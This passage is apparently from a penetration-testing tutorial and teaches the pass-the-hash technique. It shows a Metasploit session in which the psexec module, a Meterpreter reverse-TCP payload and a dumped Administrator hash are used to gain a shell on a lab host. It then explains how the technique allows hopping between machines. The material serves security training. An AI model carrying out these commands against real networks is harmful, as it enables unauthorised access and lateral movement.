In the preceding example, we ran into a slight complication: We have the administrator’s username and password hashes, but we can’t crack the password in a reasonable time frame. If we don’t know the password, how can we log into additional machines and potentially compromise more systems with this one user account?
We can use the pass-the-hash technique, which requires that we have only the password hash, not the password itself. Metasploit’s windows/smb/psexec module makes this all possible, as shown here:
msf>use windows/smb/psexecmsf exploit(psexec)>
set PAYLOAD windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcp msf exploit(psexec)>set LHOST 192.168.33.129LHOST => 192.168.33.129 msf exploit(psexec)>set LPORT 443LPORT => 443 msf exploit(psexec)>set RHOST 192.168.33.130RHOST => 192.168.33.130. . . SNIP . . .msf exploit(psexec)>set SMBPassaad3b435b51404eeaad3b435b51404ee:b75989f65d1e04af7625ed712ac36cSMBPass => aad3b435b51404eeaad3b435b51404ee:b75989f65d1e04af7625ed712ac36c29 msf exploit(psexec)>
exploit[*] Connecting to the server... [*] Started reverse handler [*] Authenticating as user 'Administrator'... [*] Uploading payload... [*] Created \JsOvAFLy.exe...
After we select the smb/psexec module at and set the options for LHOST, LPORT, and RHOST, we set the SMBPass variable, and at we input the hash that we dumped earlier. As you can see, authentication is successful and we gain our Meterpreter session. We didn’t have to crack a password, and no password was needed. We’ve secured Administrator privileges using the password hash alone.
When we successfully compromise one system on a large network, in most cases that system will have the same administrator account on multiple systems. This attack would allow us to hop from one system to another without ever needing to crack the password itself.